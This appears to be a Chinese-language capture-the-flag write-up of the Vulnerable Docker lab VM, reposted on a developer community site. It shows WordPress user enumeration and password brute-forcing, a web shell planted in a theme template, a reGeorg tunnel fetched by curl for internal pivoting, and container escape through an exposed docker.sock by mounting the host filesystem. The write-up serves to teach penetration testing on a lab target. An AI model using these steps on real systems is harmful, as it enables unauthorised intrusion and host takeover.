===========================

个人收获:

1.利用reGeorg+Proxifier进行内网渗透

2.学会wpscan

3.学会了Docker Remote api

=============================

下载地址:https://download.vulnhub.com/vulnerabledocker/

靶机总共有3个FLAG

=====================================================

靶机IP地址:192.168.110.131

Kali:192.168.110.128

======================================================

先用netdiscover来进行主机探索或者用nmap

discover -r 192.168.110.0/24

nmap -sn 192.168.110.0/24

然后使用nmap来对主机进行详细扫描

nmap -A 192.168.110.131

发现主机打开了8000端口,我们看看

是一个博客

我们在最底下发现博客使用wordpress搭建的

我们使用wpscan进行漏洞扫描

wpscan --url http://192.168.110.131:8000/

打开http://192.168.110.131:8000/robots.txt 看看有什么线索

无可用信息

使用wpscan进行枚举用户

wpscan --url http://192.168.110.131:8000/ --enumerate u

安装正常思维对用户名进行爆破

wpscan --url http://192.168.110.131:8000/ -e u --wordlist /root/1.txt

没有得到任何信息

这个时候我们在回头看起robots.txt,打开wp的登陆端

http://192.168.110.131:8000/wp-admin/

我们使用刚刚爆破出来的用户名bob进行尝试,而在这里的密码需要使用burp进行爆破

爆破的结果:

使用爆破成功的密码进入后台(找到第一个flag)

接下来我们使用wp的在线编辑功能在404页面写入一句话就可以。

*这里我用蚁剑连接老是报错无法连接,后来改用C刀就可以正常连接

收集下数据库的配置信息

然后我们用模拟终端查看下系统信息

查看下用户信息

这个系统还是比较新的直接可以放弃提权,否则Dirty Cow之类的漏洞还是可以的。不过我们参考下面的一篇文章,找到一点灵感

Tunnel Manager - From RCE to Docker Escape

输入ip addr

想起题目是Vulnerable Docker VM 猜想应该就是docker.sock或者http api未授权访问之类的问题,但是翻了下没找到

但是看到机器的IP,感觉这个虚拟机里面应该还有个docker network的内网,简单的ping下,发现至少存在172.18.0.1-4的

这个时候需要坐下内网穿透,方便在我的电脑上操作,否则shell里面缺少很多工具和依赖,比较麻烦。

===========接下来的步骤没有成功,用curl提示执行失败,代码手动写到404文件也无法连接=====================

===========直接复制原来文章的步骤=============================================================

我使用的是 reGeorg:https://github.com/sensepost/reGeorg

curl -o tunnel.php 
 
https://raw.githubusercontent.com/sensepost/reGeorg/master/tunnel.nosocket.php

浏览器访问了一下,显示Georg says,'All seems fine'

本地电脑上运行python reGeorgSocksProxy.py -u http://192.168.30.171:8000/tunnel.php

[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:8888], tunnel at [http://192.168.30.171:8000/tunnel.php]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

因为reGeorg提供的是socks5代理,所以需要本地使用proxychains具体配置不多说了

proxychains mysql -u wordpress -pWordPressISBest -h 172.18.0.4 连接数据库,

但是并没有找到什么 flag,然后继续扫内网,还是nmap那一堆命令加上proxychains前缀就好。

然后发现一个IP有个奇怪的端口

Nmap scan report for 172.18.0.3
Host is up (0.0062s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp   open  ssh
8022/tcp open  oa-system

curl看了下,貌似是一个网页,然后在设置了浏览器的socks5代理,就看到了,原来是一个网页版ssh,而且这里面终于有docker.sock

接下来就是老套路了,可以参考 :Docker学习与remote API未授权访问分析和利用:https://www.secpulse.com/archives/55928.html

而我是直接在另一个kali中里面安装了一个docker,这样就可以操作主机上的docker了。

然后使用volume挂载主机上的所有文件到一个目录

docker run -it --rm -v /:/vol wordpress /bin/bash

这样就可以看到flag_3

参考资料:

Vulnerable Docker靶机下载:https://www.vulnhub.com/entry/vulnerable-docker-1,208/

Docker学习与remote API未授权访问分析和利用:https://www.secpulse.com/archives/55928.html

WPScan使用完整教程之记一次对WordPress的渗透过程: https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=46194&page=1#pid511454

Docker学习:https://www.bilibili.com/video/av17854410?from=search&seid=13990341548063716463

Tunnel Manager - From RCE to Docker Escape:https://paper.seebug.org/396/

reGeorg:https://github.com/sensepost/reGeorg

# docker # 容器 # 运维
Logo
腾讯云开发者社区

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐

终极指南:Flink SQL连接器版本管理从混乱到有序的升级之路

Apache Flink作为流处理领域的佼佼者,其SQL连接器的版本管理一直是开发者面临的核心挑战。本文将系统讲解Flink SQL连接器版本管理的最佳实践,帮助你轻松应对版本兼容性问题,实现从混乱到有序的升级之旅。## 连接器版本管理的常见痛点 😫在Flink应用开发中,连接器版本管理常常让开发者头疼不已。不同版本的连接器可能导致各种兼容性问题,例如API变更、功能差异甚至运行时错误。

avatar 腾讯云开发者社区

Elasticsearch复杂数据类型终极指南:从入门到精通

Elasticsearch作为功能强大的搜索引擎,支持多种复杂数据类型,让开发者能够灵活处理各种结构化和非结构化数据。本文将带你全面了解Elasticsearch中的复杂数据类型,从基础概念到实际应用,助你轻松掌握数据建模的核心技巧。## 内部对象:构建层级化数据结构在Elasticsearch中,对象类型(Object)是最基础的复杂数据类型之一,用于表示具有嵌套关系的数据。例如,我们可

avatar 腾讯云开发者社区

如何快速搭建Neon无服务器PostgreSQL:面向初学者的完整指南

Neon是一款革命性的无服务器PostgreSQL解决方案,它通过分离存储和计算层,实现了自动扩缩容、类代码式数据库分支以及零级扩展能力。本指南将帮助你从零开始搭建Neon开发环境,体验这款创新数据库的强大功能。## 准备工作:环境要求与依赖项在开始搭建Neon环境前,请确保你的系统满足以下要求:- Linux操作系统(推荐Ubuntu 20.04+或Debian 11+)- Git

avatar 腾讯云开发者社区